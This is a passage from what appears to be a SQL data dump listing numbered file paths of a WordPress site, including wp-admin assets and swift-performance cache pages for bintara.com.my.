n.css'),(125,'wp-admin/css/login.css'),(126,'wp-admin/css/login.min.css'),(127,'wp-admin/css/media-rtl.css'),(128,'wp-admin/css/media-rtl.min.css'),(129,'wp-admin/css/media.css'),(130,'wp-admin/css/media.min.css'),(131,'wp-admin/css/nav-menus-rtl.css'),(132,'wp-admin/css/nav-menus-rtl.min.css'),(133,'wp-admin/css/nav-menus.css'),(134,'wp-admin/css/nav-menus.min.css'),(135,'wp-admin/css/revisions-rtl.css'),(136,'wp-admin/css/revisions-rtl.min.css'),(137,'wp-admin/css/revisions.css'),(138,'wp-admin/css/revisions.min.css'),(139,'wp-admin/css/site-icon-rtl.css'),(140,'wp-admin/css/site-icon-rtl.min.css'),(141,'wp-admin/css/site-icon.css'),(142,'wp-admin/css/site-icon.min.css'),(143,'wp-admin/css/themes-rtl.css'),(144,'wp-admin/css/themes-rtl.min.css'),(145,'wp-admin/css/themes.css'),(146,'wp-admin/css/themes.min.css'),(147,'wp-admin/css/widgets-rtl.css'),(148,'wp-admin/css/widgets-rtl.min.css'),(149,'wp-admin/css/widgets.css'),(150,'wp-admin/css/widgets.min.css'),(151,'wp-admin/css/wp-admin-rtl.css'),(152,'wp-admin/css/wp-admin-rtl.min.css'),(153,'wp-admin/css/wp-admin.css'),(154,'wp-admin/css/wp-admin.min.css'),(155,'wp-admin/custom-background.php'),(156,'wp-admin/custom-header.php'),(157,'wp-admin/customize.php'),(158,'wp-admin/edit-comments.php'),(159,'wp-admin/edit-form-advanced.php'),(160,'wp-admin/edit-form-blocks.php'),(161,'wp-admin/edit-form-comment.php'),(162,'wp-admin/edit-link-form.php'),(163,'wp-admin/edit-tag-form.php'),(164,'wp-admin/edit-tags.php'),(165,'wp-admin/edit.php'),(166,'wp-admin/error_log'),(167,'wp-admin/export.php'),(168,'wp-admin/freedoms.php'),(169,'wp-admin/images/align-center-2x.png'),(170,'wp-admin/images/align-center.png'),(171,'wp-admin/images/align-left-2x.png'),(172,'wp-admin/images/align-left.png'),(173,'wp-admin/images/align-none-2x.png'),(174,'wp-admin/images/align-none.png'),(175,'wp-admin/images/align-right-2x.png'),(176,'wp-admin/images/align-right.png'),(177,'wp-admin/images/arrows-2x.png'),(178,'wp-admin/images/arrows.png'),(179,'wp-admin/images/browser-rtl.png'),(180,'wp-admin/images/browser.png'),(181,'wp-admin/images/bubble_bg-2x.gif'),(182,'wp-admin/images/bubble_bg.gif'),(183,'wp-admin/images/comment-grey-bubble-2x.png'),(184,'wp-admin/images/comment-grey-bubble.png'),(185,'wp-admin/images/date-button-2x.gif'),(186,'wp-admin/images/date-button.gif'),(187,'wp-admin/images/generic.png'),(188,'wp-admin/images/icons32-2x.png'),(189,'wp-admin/images/icons32-vs-2x.png'),(190,'wp-admin/images/icons32-vs.png'),(191,'wp-admin/images/icons32.png'),(192,'wp-admin/images/imgedit-icons-2x.png'),(193,'wp-admin/images/imgedit-icons.png'),(194,'wp-admin/images/list-2x.png'),(195,'wp-admin/images/list.png'),(196,'wp-admin/images/loading.gif'),(197,'wp-admin/images/marker.png'),(198,'wp-admin/images/mask.png'),(199,'wp-admin/images/media-button-2x.png'),(200,'wp-admin/images/media-button-image.gif'),(201,'wp-admin/images/media-button-music.gif'),(202,'wp-admin/images/media-button-other.gif'),(203,'wp-admin/images/media-button-video.gif'),(204,'wp-admin/images/media-button.png'),(205,'wp-admin/images/menu-2x.png'),(206,'wp-admin/images/menu-vs-2x.png'),(207,'wp-admin/images/menu-vs.png'),(208,'wp-admin/images/menu.png'),(209,'wp-admin/images/no.png'),(210,'wp-admin/images/post-formats-vs.png'),(211,'wp-admin/images/post-formats.png'),(212,'wp-admin/images/post-formats32-vs.png'),(213,'wp-admin/images/post-formats32.png'),(214,'wp-admin/images/resize-2x.gif'),(215,'wp-admin/images/resize-rtl-2x.gif'),(216,'wp-admin/images/resize-rtl.gif'),(217,'wp-admin/images/resize.gif'),(218,'wp-admin/images/se.png'),(219,'wp-admin/images/sort-2x.gif'),(220,'wp-admin/images/sort.gif'),(221,'wp-admin/images/spinner-2x.gif'),(222,'wp-admin/images/spinner.gif'),(223,'wp-admin/images/stars-2x.png'),(224,'wp-admin/images/stars.png'),(225,'wp-admin/images/w-logo-blue.png'),(226,'wp-admin/images/w-logo-white.png'),(227,'wp-admin/images/wheel.png'),(228,'wp-admin/images/wordpress-logo-white.svg'),(229,'wp-admin/images/wordpress-logo.png'),(230,'wp-admin/images/wordpress-logo.svg'),(231,'wp-admin/images/wpspin_light-2x.gif'),(232,'wp-admin/images/wpspin_light.gif'),(233,'wp-admin/images/xit-2x.gif'),(234,'wp-admin/images/xit.gif'),(235,'wp-admin/images/yes.png'),(236,'wp-admin/import.php'),(237,'wp-admin/includes/admin-filters.php'),(238,'wp-admin/includes/admin.php'),(239,'wp-admin/includes/ajax-actions.php'),(240,'wp-admin/includes/bookmark.php'),(241,'wp-admin/includes/class-automatic-upgrader-skin.php'),(242,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(243,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(244,'wp-admin/includes/class-bulk-upgrader-skin.php'),(245,'wp-admin/includes/class-core-upgrader.php'),(246,'wp-admin/includes/class-file-upload-upgrader.php'),(247,'wp-admin/includes/class-ftp-pure.php'),(248,'wp-admin/includes/class-ftp-sockets.php'),(249,'wp-admin/includes/class-ftp.php'),(250,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(251,'wp-admin/includes/class-language-pack-upgrader.php'),(252,'wp-admin/includes/class-pclzip.php'),(253,'wp-admin/includes/class-plugin-installer-skin.php'),(254,'wp-admin/includes/class-plugin-upgrader-skin.php'),(255,'wp-admin/includes/class-plugin-upgrader.php'),(256,'wp-admin/includes/class-theme-installer-skin.php'),(257,'wp-admin/includes/class-theme-upgrader-skin.php'),(258,'wp-admin/includes/class-theme-upgrader.php'),(259,'wp-admin/includes/class-walker-category-checklist.php'),(260,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(261,'wp-admin/includes/class-walker-nav-menu-edit.php'),(262,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(263,'wp-admin/includes/class-wp-automatic-updater.php'),(264,'wp-admin/includes/class-wp-comments-list-table.php'),(265,'wp-admin/includes/class-wp-community-events.php'),(266,'wp-admin/includes/class-wp-filesystem-base.php'),(267,'wp-admin/includes/class-wp-filesystem-direct.php'),(268,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(269,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(270,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(271,'wp-admin/includes/class-wp-importer.php'),(272,'wp-admin/includes/class-wp-internal-pointers.php'),(273,'wp-admin/includes/class-wp-links-list-table.php'),(274,'wp-admin/includes/class-wp-list-table-compat.php'),(275,'wp-admin/includes/class-wp-list-table.php'),(276,'wp-admin/includes/class-wp-media-list-table.php'),(277,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(278,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(279,'wp-admin/includes/class-wp-ms-users-list-table.php'),(280,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(281,'wp-admin/includes/class-wp-plugins-list-table.php'),(282,'wp-admin/includes/class-wp-post-comments-list-table.php'),(283,'wp-admin/includes/class-wp-posts-list-table.php'),(284,'wp-admin/includes/class-wp-screen.php'),(285,'wp-admin/includes/class-wp-site-icon.php'),(286,'wp-admin/includes/class-wp-terms-list-table.php'),(287,'wp-admin/includes/class-wp-theme-install-list-table.php'),(288,'wp-admin/includes/class-wp-themes-list-table.php'),(289,'wp-admin/includes/class-wp-upgrader-skin.php'),(290,'wp-admin/includes/class-wp-upgrader-skins.php'),(291,'wp-admin/includes/class-wp-upgrader.php'),(292,'wp-admin/includes/class-wp-users-list-table.php'),(293,'wp-admin/includes/comment.php'),(294,'wp-admin/includes/continents-cities.php'),(295,'wp-admin/includes/credits.php'),(296,'wp-admin/includes/dashboard.php'),(297,'wp-admin/includes/deprecated.php'),(298,'wp-admin/includes/edit-tag-messages.php'),(299,'wp-admin/includes/export.php'),(300,'wp-admin/includes/file.php'),(301,'wp-admin/includes/image-edit.php'),(302,'wp-admin/includes/image.php'),(303,'wp-admin/includes/import.php'),(304,'wp-admin/includes/list-table.php'),(305,'wp-admin/includes/media.php'),(306,'wp-admin/includes/menu.php'),(307,'wp-admin/includes/meta-boxes.php'),(308,'wp-admin/includes/misc.php'),(309,'wp-admin/includes/ms-admin-filters.php'),(310,'wp-admin/includes/ms-deprecated.php'),(311,'wp-admin/includes/ms.php'),(312,'wp-admin/includes/nav-menu.php'),(313,'wp-admin/includes/network.php'),(314,'wp-admin/includes/noop.php'),(315,'wp-admin/includes/options.php'),(316,'wp-admin/includes/plugin-install.php'),(317,'wp-admin/includes/plugin.php'),(318,'wp-admin/includes/post.php'),(319,'wp-admin/includes/revision.php'),(320,'wp-admin/includes/schema.php'),(321,'wp-admin/includes/screen.php'),(322,'wp-admin/includes/taxonomy.php'),(323,'wp-admin/includes/template.php'),(324,'wp-admin/includes/theme-install.php'),(325,'wp-admin/includes/theme.php'),(326,'wp-admin/includes/translation-install.php'),(327,'wp-admin/includes/update-core.php'),(328,'wp-admin/includes/update.php'),(329,'wp-admin/includes/upgrade.php'),(330,'wp-admin/includes/user.php'),(331,'wp-admin/includes/widgets.php'),(332,'wp-admin/index.php'),(333,'wp-admin/install-helper.php'),(334,'wp-admin/install.php'),(335,'wp-admin/js/accordion.js'),(336,'wp-admin/js/accordion.min.js'),(337,'wp-admin/js/code-editor.js'),(338,'wp-admin/js/code-editor.min.js'),(339,'wp-admin/js/color-picker.js'),(340,'wp-admin/js/color-picker.min.js'),(341,'wp-admin/js/comment.js'),(342,'wp-admin/js/comment.min.js'),(343,'wp-admin/js/common.js'),(344,'wp-admin/js/common.min.js'),(345,'wp-admin/js/custom-background.js'),(346,'wp-admin/js/custom-background.min.js'),(347,'wp-admin/js/custom-header.js'),(348,'wp-admin/js/customize-controls.js'),(349,'wp-admin/js/customize-controls.min.js'),(350,'wp-admin/js/customize-nav-menus.js'),(351,'wp-admin/js/customize-nav-menus.min.js'),(352,'wp-admin/js/customize-widgets.js'),(353,'wp-admin/js/customize-widgets.min.js'),(354,'wp-admin/js/dashboard.js'),(355,'wp-admin/js/dashboard.min.js'),(356,'wp-admin/js/edit-comments.js'),(357,'wp-admin/js/edit-comments.min.js'),(358,'wp-admin/js/editor-expand.js'),(359,'wp-admin/js/editor-expand.min.js'),(360,'wp-admin/js/editor.js'),(361,'wp-admin/js/editor.min.js'),(362,'wp-admin/js/farbtastic.js'),(363,'wp-admin/js/gallery.js'),(364,'wp-admin/js/gallery.min.js'),(365,'wp-admin/js/image-edit.js'),(366,'wp-admin/js/image-edit.min.js'),(367,'wp-admin/js/inline-edit-post.js'),(368,'wp-admin/js/inline-edit-post.min.js'),(369,'wp-admin/js/inline-edit-tax.js'),(370,'wp-admin/js/inline-edit-tax.min.js'),(371,'wp-admin/js/iris.min.js'),(372,'wp-admin/js/language-chooser.js'),(373,'wp-admin/js/language-chooser.min.js'),(374,'wp-admin/js/link.js'),(375,'wp-admin/js/link.min.js'),(376,'wp-admin/js/media-gallery.js'),(377,'wp-admin/js/media-gallery.min.js'),(378,'wp-admin/js/media-upload.js'),(379,'wp-admin/js/media-upload.min.js'),(380,'wp-admin/js/media.js'),(381,'wp-admin/js/media.min.js'),(382,'wp-admin/js/nav-menu.js'),(383,'wp-admin/js/nav-menu.min.js'),(384,'wp-admin/js/password-strength-meter.js'),(385,'wp-admin/js/password-strength-meter.min.js'),(386,'wp-admin/js/plugin-install.js'),(387,'wp-admin/js/plugin-install.min.js'),(388,'wp-admin/js/post.js'),(389,'wp-admin/js/post.min.js'),(390,'wp-admin/js/postbox.js'),(391,'wp-admin/js/postbox.min.js'),(392,'wp-admin/js/revisions.js'),(393,'wp-admin/js/revisions.min.js'),(394,'wp-admin/js/set-post-thumbnail.js'),(395,'wp-admin/js/set-post-thumbnail.min.js'),(396,'wp-admin/js/svg-painter.js'),(397,'wp-admin/js/svg-painter.min.js'),(398,'wp-admin/js/tags-box.js'),(399,'wp-admin/js/tags-box.min.js'),(400,'wp-admin/js/tags-suggest.js'),(401,'wp-admin/js/tags-suggest.min.js'),(402,'wp-admin/js/tags.js'),(403,'wp-admin/js/tags.min.js'),(404,'wp-admin/js/theme-plugin-editor.js'),(405,'wp-admin/js/theme-plugin-editor.min.js'),(406,'wp-admin/js/theme.js'),(407,'wp-admin/js/theme.min.js'),(408,'wp-admin/js/updates.js'),(409,'wp-admin/js/updates.min.js'),(410,'wp-admin/js/user-profile.js'),(411,'wp-admin/js/user-profile.min.js'),(412,'wp-admin/js/user-suggest.js'),(413,'wp-admin/js/user-suggest.min.js'),(414,'wp-admin/js/widgets/custom-html-widgets.js'),(415,'wp-admin/js/widgets/custom-html-widgets.min.js'),(416,'wp-admin/js/widgets/media-audio-widget.js'),(417,'wp-admin/js/widgets/media-audio-widget.min.js'),(418,'wp-admin/js/widgets/media-gallery-widget.js'),(419,'wp-admin/js/widgets/media-gallery-widget.min.js'),(420,'wp-admin/js/widgets/media-image-widget.js'),(421,'wp-admin/js/widgets/media-image-widget.min.js'),(422,'wp-admin/js/widgets/media-video-widget.js'),(423,'wp-admin/js/widgets/media-video-widget.min.js'),(424,'wp-admin/js/widgets/media-widgets.js'),(425,'wp-admin/js/widgets/media-widgets.min.js'),(426,'wp-admin/js/widgets/text-widgets.js'),(427,'wp-admin/js/widgets/text-widgets.min.js'),(428,'wp-admin/js/widgets.js'),(429,'wp-admin/js/widgets.min.js'),(430,'wp-admin/js/word-count.js'),(431,'wp-admin/js/word-count.min.js'),(432,'wp-admin/js/wp-fullscreen-stub.js'),(433,'wp-admin/js/wp-fullscreen-stub.min.js'),(434,'wp-admin/js/xfn.js'),(435,'wp-admin/js/xfn.min.js'),(436,'wp-admin/link-add.php'),(437,'wp-admin/link-manager.php'),(438,'wp-admin/link-parse-opml.php'),(439,'wp-admin/link.php'),(440,'wp-admin/load-scripts.php'),(441,'wp-admin/load-styles.php'),(442,'wp-admin/maint/repair.php'),(443,'wp-admin/media-new.php'),(444,'wp-admin/media-upload.php'),(445,'wp-admin/media.php'),(446,'wp-admin/menu-header.php'),(447,'wp-admin/menu.php'),(448,'wp-admin/moderation.php'),(449,'wp-admin/ms-admin.php'),(450,'wp-admin/ms-delete-site.php'),(451,'wp-admin/ms-edit.php'),(452,'wp-admin/ms-options.php'),(453,'wp-admin/ms-sites.php'),(454,'wp-admin/ms-themes.php'),(455,'wp-admin/ms-upgrade-network.php'),(456,'wp-admin/ms-users.php'),(457,'wp-admin/my-sites.php'),(458,'wp-admin/nav-menus.php'),(459,'wp-admin/network/about.php'),(460,'wp-admin/network/admin.php'),(461,'wp-admin/network/credits.php'),(462,'wp-admin/network/edit.php'),(463,'wp-admin/network/error_log'),(464,'wp-admin/network/freedoms.php'),(465,'wp-admin/network/index.php'),(466,'wp-admin/network/menu.php'),(467,'wp-admin/network/plugin-editor.php'),(468,'wp-admin/network/plugin-install.php'),(469,'wp-admin/network/plugins.php'),(470,'wp-admin/network/privacy.php'),(471,'wp-admin/network/profile.php'),(472,'wp-admin/network/settings.php'),(473,'wp-admin/network/setup.php'),(474,'wp-admin/network/site-info.php'),(475,'wp-admin/network/site-new.php'),(476,'wp-admin/network/site-settings.php'),(477,'wp-admin/network/site-themes.php'),(478,'wp-admin/network/site-users.php'),(479,'wp-admin/network/sites.php'),(480,'wp-admin/network/theme-editor.php'),(481,'wp-admin/network/theme-install.php'),(482,'wp-admin/network/themes.php'),(483,'wp-admin/network/update-core.php'),(484,'wp-admin/network/update.php'),(485,'wp-admin/network/upgrade.php'),(486,'wp-admin/network/user-edit.php'),(487,'wp-admin/network/user-new.php'),(488,'wp-admin/network/users.php'),(489,'wp-admin/network.php'),(490,'wp-admin/options-discussion.php'),(491,'wp-admin/options-general.php'),(492,'wp-admin/options-head.php'),(493,'wp-admin/options-media.php'),(494,'wp-admin/options-permalink.php'),(495,'wp-admin/options-reading.php'),(496,'wp-admin/options-writing.php'),(497,'wp-admin/options.php'),(498,'wp-admin/plugin-editor.php'),(499,'wp-admin/plugin-install.php'),(500,'wp-admin/plugins.php'),(501,'wp-admin/post-new.php'),(502,'wp-admin/post.php'),(503,'wp-admin/press-this.php'),(504,'wp-admin/privacy.php'),(505,'wp-admin/profile.php'),(506,'wp-admin/revision.php'),(507,'wp-admin/setup-config.php'),(508,'wp-admin/term.php'),(509,'wp-admin/theme-editor.php'),(510,'wp-admin/theme-install.php'),(511,'wp-admin/themes.php'),(512,'wp-admin/tools.php'),(513,'wp-admin/update-core.php'),(514,'wp-admin/update.php'),(515,'wp-admin/upgrade-functions.php'),(516,'wp-admin/upgrade.php'),(517,'wp-admin/upload.php'),(518,'wp-admin/user/about.php'),(519,'wp-admin/user/admin.php'),(520,'wp-admin/user/credits.php'),(521,'wp-admin/user/freedoms.php'),(522,'wp-admin/user/index.php'),(523,'wp-admin/user/menu.php'),(524,'wp-admin/user/privacy.php'),(525,'wp-admin/user/profile.php'),(526,'wp-admin/user/user-edit.php'),(527,'wp-admin/user-edit.php'),(528,'wp-admin/user-new.php'),(529,'wp-admin/users.php'),(530,'wp-admin/widgets.php'),(531,'wp-blog-header.php'),(532,'wp-comments-post.php'),(533,'wp-config-sample.php'),(534,'wp-config.php'),(535,'wp-content/ai1wm-backups/index.php'),(536,'wp-content/aiowps_backups/index.html'),(537,'wp-content/cache/swift-performance/bintara.com.my/About/desktop/unauthenticated/index.html'),(538,'wp-content/cache/swift-performance/bintara.com.my/about/desktop/unauthenticated/index.html'),(539,'wp-content/cache/swift-performance/bintara.com.my/about-us/desktop/unauthenticated/index.html'),(540,'wp-content/cache/swift-performance/bintara.com.my/about-us.asp/desktop/unauthenticated/index.html'),(541,'wp-content/cache/swift-performance/bintara.com.my/about-us.aspx/desktop/unauthenticated/index.html'),(542,'wp-content/cache/swift-performance/bintara.com.my/about-us.htm/desktop/unauthenticated/index.html'),(543,'wp-content/cache/swift-performance/bintara.com.my/about-us.html/desktop/unauthenticated/index.html'),(544,'wp-content/cache/swift-performance/bintara.com.my/about-us.jsp/desktop/unauthenticated/index.html'),(545,'wp-content/cache/swift-performance/bintara.com.my/about-us.php/desktop/unauthenticated/index.html'),(546,'wp-content/cache/swift-performance/bintara.com.my/about.asp/desktop/unauthenticated/index.html'),(547,'wp-content/cache/swift-performance/bintara.com.my/about.aspx/desktop/unauthenticated/index.html'),(548,'wp-content/cache/swift-performance/bintara.com.my/about.htm/desktop/unauthenticated/index.html'),(549,'wp-content/cache/swift-performance/bintara.com.my/about.html/desktop/unauthenticated/index.html'),(550,'wp-content/cache/swift-performance/bintara.com.my/about.jsp/desktop/unauthenticated/index.html'),(551,'wp-content/cache/swift-performance/bintara.com.my/about.php/desktop/unauthenticated/index.html'),(552,'wp-content/cache/swift-performance/bintara.com.my/about_us/desktop/unauthenticated/index.html'),(553,'wp-content/cache/swift-performance/bintara.com.my/about_us.asp/desktop/unauthenticated/index.html'),(554,'wp-content/cache/swift-performance/bintara.com.my/about_us.aspx/desktop/unauthenticated/index.html'),(555,'wp-content/cache/swift-performance/bintara.com.my/about_us.htm/desktop/unauthenticated/index.html'),(556,'wp-content/cache/swift-performance/bintara.com.my/about_us.html/desktop/unauthenticated/index.html'),(557,'wp-content/cache/swift-performance/bintara.com.my/about_us.jsp/desktop/unauthenticated/index.html'),(558,'wp-content/cache/swift-performance/bintara.com.my/about_us.php/desktop/unauthenticated/index.html'),(559,'wp-content/cache/swift-performance/bintara.com.my/aboutus/desktop/unauthenticated/index.html'),(560,'wp-content/cache/swift-performance/bintara.com.my/aboutus.asp/desktop/unauthenticated/index.html'),(561,'wp-content/cache/swift-performance/bintara.com.my/aboutus.aspx/desktop/unauthenticated/index.html'),(562,'wp-content/cache/swift-performance/bintara.com.my/aboutus.htm/desktop/unauthenticated/index.html'),(563,'wp-content/cache/swift-performance/bintara.com.my/aboutus.html/desktop/unauthenticated/index.html'),(564,'wp-content/cache/swift-performance/bintara.com.my/aboutus.jsp/desktop/unauthenticated/index.html'),(565,'wp-content/cache/swift-performance/bintara.com.my/aboutus.php/desktop/unauthenticated/index.html'),(566,'wp-content/cache/swift-performance/bintara.com.my/acer/desktop/unauthenticated/index.html'),(567,'wp-content/cache/swift-performance/bintara.com.my/acronis/desktop/unauthenticated/index.html'),(568,'wp-content/cache/swift-performance/bintara.com.my/adobe/desktop/unauthenticated/index.html'),(569,'wp-content/cache/swift-performance/bintara.com.my/anydesk/desktop/unauthenticated/index.html'),(570,'wp-content/cache/swift-performance/bintara.com.my/apc/desktop/unauthenticated/index.html'),(571,'wp-content/cache/swift-performance/bintara.com.my/apple/desktop/unauthenticated/index.html'),(572,'wp-content/cache/swift-performance/bintara.com.my/arcadia/desktop/unauthenticated/index.html'),(573,'wp-content/cache/swift-performance/bintara.com.my/aruba/desktop/unauthenticated/index.html'),(574,'wp-content/cache/swift-performance/bintara.com.my/asus/desktop/unauthenticated/index.html'),(575,'wp-content/cache/swift-performance/bintara.com.my/atlas-ti/desktop/unauthenticated/index.html'),(576,'wp-content/cache/swift-performance/bintara.com.my/autodesk/desktop/unauthenticated/index.html'),(577,'wp-content/cache/swift-performance/bintara.com.my/barracuda/desktop/unauthenticated/index.html'),(578,'wp-content/cache/swift-performance/bintara.com.my/belkin/desktop/unauthenticated/index.html'),(579,'wp-content/cache/swift-performance/bintara.com.my/benq/desktop/unauthenticated/index.html'),(580,'wp-content/cache/swift-performance/bintara.com.my/benq-rp704k-4k-uhd-70/desktop/unauthenticated/index.html'),(581,'wp-content/cache/swift-performance/bintara.com.my/bitdefender/desktop/unauthenticated/index.html'),(582,'wp-content/cache/swift-performance/bintara.com.my/blog/2018/12/11/logitech-rally/desktop/unauthenticated/index.html'),(583,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/adobe/desktop/unauthenticated/index.html'),(584,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/arcadia/desktop/unauthenticated/index.html'),(585,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/autodesk/desktop/unauthenticated/index.html'),(586,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/cambium/desktop/unauthenticated/index.html'),(587,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/coreldraw/desktop/unauthenticated/index.html'),(588,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/d-link/desktop/unauthenticated/index.html'),(589,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/dell-emc/desktop/unauthenticated/index.html'),(590,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/epson/desktop/unauthenticated/index.html'),(591,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/fortinet/desktop/unauthenticated/index.html'),(592,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/honeywell/desktop/unauthenticated/index.html'),(593,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/hp/desktop/unauthenticated/index.html'),(594,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/huawei/desktop/unauthenticated/index.html'),(595,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/lenovo/desktop/unauthenticated/index.html'),(596,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/mcafee/desktop/unauthenticated/index.html'),(597,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/microsoft/desktop/unauthenticated/index.html'),(598,'wp-content/cache/swift-performance/bintara.com.my/blog/portfolio/solarwinds/desktop/unauthenticated/index.html'),(599,'wp-content/cache/swift-performance/bintara.com.my/bluejeans/desktop/unauthenticated/index.html'),(600,'wp-content/cache/swift-performance/bintara.com.my/broadbase/desktop/unauthenticated/index.html'),(601,'wp-content/cache/swift-performance/bintara.com.my/cambium/desktop/unauthenticated/index.html'),(602,'wp-content/cache/swift-performance/bintara.com.my/canon/desktop/unauthenticated/index.html'),(603,'wp-content/cache/swift-performance/bintara.com.my/careers/desktop/unauthenticated/index.html'),(604,'wp-content/cache/swift-performance/bintara.com.my/cisco/desktop/unauthenticated/index.html'),(605,'wp-content/cache/swift-performance/bintara.com.my/comments/feed/desktop/unauthenticated/index.html'),(606,'wp-content/cache/swift-performance/bintara.com.my/contact-us/desktop/unauthenticated/index.html'),(607,'wp-content/cache/swift-performance/bintara.com.my/contact-us.asp/desktop/unauthenticated/index.html'),(608,'wp-content/cache/swift-performance/bintara.com.my/contact-us.aspx/desktop/unauthenticated/index.html'),(609,'wp-content/cache/swift-performance/bintara.com.my/contact-us.htm/desktop/unauthenticated/index.html'),(610,'wp-content/cache/swift-performance/bintara.com.my/contact-us.html/desktop/unauthenticated/index.html'),(611,'wp-content/cache/swift-performance/bintara.com.my/contact-us.jsp/desktop/unauthenticated/index.html'),(612,'wp-content/cache/swift-performance/bintara.com.my/contact-us.php/desktop/unauthenticated/index.html'),(613,'wp-content/cache/swift-performance/bintara.com.my/contacts/desktop/unauthenticated/index.html'),(614,'wp-content/cache/swift-performance/bintara.com.my/contacts.asp/desktop/unauthenticated/index.html'),(615,'wp-content/cache/swift-performance/bintara.com.my/contacts.aspx/desktop/unauthenticated/index.html'),(616,'wp-content/cache/swift-performance/bintara.com.my/contacts.htm/desktop/unauthenticated/index.html'),(617,'wp-content/cache/swift-performance/bintara.com.my/contacts.html/desktop/unauthenticated/index.html'),(618,'wp-content/cache/swift-performance/bintara.com.my/contacts.jsp/desktop/unauthenticated/index.html'),(619,'wp-content/cache/swift-performance/bintara.com.my/contacts.php/desktop/unauthenticated/index.html'),(620,'wp-content/cache/swift-performance/bintara.com.my/coreldraw/desktop/unauthenticated/index.html'),(621,'wp-content/cache/swift-performance/bintara.com.my/d-link/desktop/unauthenticated/index.html'),(622,'wp-content/cache/swift-performance/bintara.com.my/dell-emc/desktop/unauthenticated/index.html'),(623,'wp-content/cache/swift-performance/bintara.com.my/dell-large-displays/desktop/unauthenticated/index.html'),(624,'wp-content/cache/swift-performance/bintara.com.my/designjet-large-format-office-printers/desktop/unauthenticated/index.html'),(625,'wp-content/cache/swift-performance/bintara.com.my/desktop/unauthenticated/index.html'),(626,'wp-content/cache/swift-performance/bintara.com.my/docusign/desktop/unauthenticated/index.html'),(627,'wp-content/cache/swift-performance/bintara.com.my/dropbox/desktop/unauthenticated/index.html'),(628,'wp-content/cache/swift-performance/bintara.com.my/epson/desktop/unauthenticated/index.html'),(629,'wp-content/cache/swift-performance/bintara.com.my/ergotron/desktop/unauthenticated/index.html'),(630,'wp-content/cache/swift-performance/bintara.com.my/eset/desktop/unauthenticated/index.html'),(631,'wp-content/cache/swift-performance/bintara.com.my/faronics/desktop/unauthenticated/index.html'),(632,'wp-content/cache/swift-performance/bintara.com.my/feed/desktop/unauthenticated/index.html'),(633,'wp-content/cache/swift-performance/bintara.com.my/fortinet/desktop/unauthenticated/index.html'),(634,'wp-content/cache/swift-performance/bintara.com.my/fujixerox/desktop/unauthenticated/index.html'),(635,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-acer/desktop/unauthenticated/index.html'),(636,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-asus/desktop/unauthenticated/index.html'),(637,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-belkin/desktop/unauthenticated/index.html'),(638,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-broadbase/desktop/unauthenticated/index.html'),(639,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-canon/desktop/unauthenticated/index.html'),(640,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-d-link/desktop/unauthenticated/index.html'),(641,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-epson/desktop/unauthenticated/index.html'),(642,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-hpe/desktop/unauthenticated/index.html'),(643,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-jabra-evolve/desktop/unauthenticated/index.html'),(644,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-logitech/desktop/unauthenticated/index.html'),(645,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-logitech/embed/desktop/unauthenticated/index.html'),(646,'wp-content/cache/swift-performance/bintara.com.my/get-quotation-panasonic-toughbook/desktop/unauthenticated/index.html'),(647,'wp-content/cache/swift-performance/bintara.com.my/gotomeeting/desktop/unauthenticated/index.html'),(648,'wp-content/cache/swift-performance/bintara.com.my/gototraining/desktop/unauthenticated/index.html'),(649,'wp-content/cache/swift-performance/bintara.com.my/gotowebinar/desktop/unauthenticated/index.html'),(650,'wp-content/cache/swift-performance/bintara.com.my/honeywell/desktop/unauthenticated/index.html'),(651,'wp-content/cache/swift-performance/bintara.com.my/houdini/desktop/unauthenticated/index.html'),(652,'wp-content/cache/swift-performance/bintara.com.my/hpe/desktop/unauthenticated/index.html'),(653,'wp-content/cache/swift-performance/bintara.com.my/huawei/desktop/unauthenticated/index.html'),(654,'wp-content/cache/swift-performance/bintara.com.my/ibm/desktop/unauthenticated/index.html'),(655,'wp-content/cache/swift-performance/bintara.com.my/includes/404.php/desktop/unauthenticated/index.html'),(656,'wp-content/cache/swift-performance/bintara.com.my/infocus/desktop/unauthenticated/index.html'),(657,'wp-content/cache/swift-performance/bintara.com.my/jabra/desktop/unauthenticated/index.html'),(658,'wp-content/cache/swift-performance/bintara.com.my/jabra-panacast/desktop/unauthenticated/index.html'),(659,'wp-content/cache/swift-performance/bintara.com.my/juniper/desktop/unauthenticated/index.html'),(660,'wp-content/cache/swift-performance/bintara.com.my/kaspersky/desktop/unauthenticated/index.html'),(661,'wp-content/cache/swift-performance/bintara.com.my/kingston/desktop/unauthenticated/index.html'),(662,'wp-content/cache/swift-performance/bintara.com.my/lenovo/desktop/unauthenticated/index.html'),(